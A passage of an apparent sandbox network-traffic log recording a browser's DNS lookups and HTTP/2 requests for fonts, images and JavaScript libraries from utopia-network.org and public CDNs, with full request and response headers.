                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 88592
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Jura-Bold.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Jura-Bold.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 92888
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Prompt-Regular.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Prompt-Regular.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 68848
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Prompt-Medium.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Prompt-Medium.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 70732
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Prompt-SemiBold.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Prompt-SemiBold.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 69852
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/messenger__bg-glitch.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/messenger__bg-glitch.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 23550
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/top-bg_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/top-bg_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 131520
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/api__bg_mobile.svg
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/api__bg_mobile.svg HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          vary: Accept-Encoding
                                                                                          content-encoding: gzip
                                                                                          content-length: 241
                                                                                          content-type: image/svg+xml
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/footer__bg_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/footer__bg_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 41258
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__bg_mobile.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__bg_mobile.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 171410
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Inter-Regular.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Inter-Regular.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 171300
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/fonts/Inter-Medium.woff
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /fonts/Inter-Medium.woff HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 02 Apr 2021 23:43:16 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 180144
                                                                                          content-type: font/woff
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/icons/video-play.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/icons/video-play.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 6151
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__bg.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__bg.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 682154
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/reason__globe.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/reason__globe.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 372430
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.utopia-network.org/img/footer__bg.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          162.0.209.78:443
                                                                                          Request
                                                                                          GET /img/footer__bg.png HTTP/2.0
                                                                                          host: www.utopia-network.org
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          server: Apache
                                                                                          last-modified: Fri, 14 May 2021 19:25:14 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 94784
                                                                                          content-type: image/png
                                                                                          x-frame-options: SAMEORIGIN
                                                                                          x-xss-protection: 1; mode=block
                                                                                          x-content-type-options: nosniff
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                                                                          referrer-policy: no-referrer-when-downgrade
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          kit.fontawesome.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          kit.fontawesome.com
                                                                                          IN A
                                                                                          Response
                                                                                          kit.fontawesome.com
                                                                                          IN CNAME
                                                                                          kit.fontawesome.com.cdn.cloudflare.net
                                                                                          kit.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.18.22.52
                                                                                          kit.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.18.23.52
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://kit.fontawesome.com/55e0136003.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.18.22.52:443
                                                                                          Request
                                                                                          GET /55e0136003.js HTTP/2.0
                                                                                          host: kit.fontawesome.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:23 GMT
                                                                                          content-type: text/javascript
                                                                                          access-control-allow-headers: accept, accept-langauge, content-language, content-type, fa-kit-token
                                                                                          access-control-allow-methods: GET, OPTIONS
                                                                                          access-control-allow-origin: *
                                                                                          access-control-max-age: 3000
                                                                                          cache-control: max-age=60, public, must-revalidate
                                                                                          strict-transport-security: max-age=31536000; preload
                                                                                          vary: origin, accept-encoding, access-control-request-headers, access-control-request-method
                                                                                          x-request-id: FozBQERdOTgFNF5Zu_lB
                                                                                          cf-cache-status: REVALIDATED
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53263db63d47b-HAM
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          unpkg.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          Response
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.126.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.125.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.122.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.124.175
                                                                                          unpkg.com
                                                                                          IN A
                                                                                          104.16.123.175
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/tippy.js@6/dist/tippy-bundle.umd.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /tippy.js@6/dist/tippy-bundle.umd.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/plain; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, s-maxage=600, max-age=60
                                                                                          location: /tippy.js@6.3.1/dist/tippy-bundle.umd.js
                                                                                          vary: Accept, Accept-Encoding
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01FA6QYKSJTP65ANTBCQCFC30X
                                                                                          cf-cache-status: HIT
                                                                                          age: 356
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53266eb0c1ec2-AMS
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/@popperjs/core@2/dist/umd/popper.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /@popperjs/core@2/dist/umd/popper.min.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: text/plain; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, s-maxage=600, max-age=60
                                                                                          location: /@popperjs/core@2.9.2/dist/umd/popper.min.js
                                                                                          vary: Accept, Accept-Encoding
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01FA6R08F20F753JYPHMQK0T9Y
                                                                                          cf-cache-status: HIT
                                                                                          age: 302
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53266eb0d1ec2-AMS
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/@popperjs/core@2.9.2/dist/umd/popper.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /@popperjs/core@2.9.2/dist/umd/popper.min.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=31536000
                                                                                          last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                          etag: W/"48a2-jut79x6Kl4uCoaGYAV8U1z0upZI"
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01F3YK2Z4VP85T0YA6QPXNDT71
                                                                                          cf-cache-status: HIT
                                                                                          age: 6716342
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c532672b591ec2-AMS
                                                                                          content-encoding: br
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://unpkg.com/tippy.js@6.3.1/dist/tippy-bundle.umd.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.126.175:443
                                                                                          Request
                                                                                          GET /tippy.js@6.3.1/dist/tippy-bundle.umd.js HTTP/2.0
                                                                                          host: unpkg.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=31536000
                                                                                          last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                          etag: W/"130c6-eb9u11+OJfe2374TXJky5XdFYJ8"
                                                                                          via: 1.1 fly.io
                                                                                          fly-request-id: 01F3YK3ACY3WVND3AQR0QQYP6S
                                                                                          cf-cache-status: HIT
                                                                                          age: 6716331
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                          x-content-type-options: nosniff
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53267abea1ec2-AMS
                                                                                          content-encoding: br
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/css/free.min.css?token=55e0136003
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/css/free.min.css?token=55e0136003 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:24 GMT
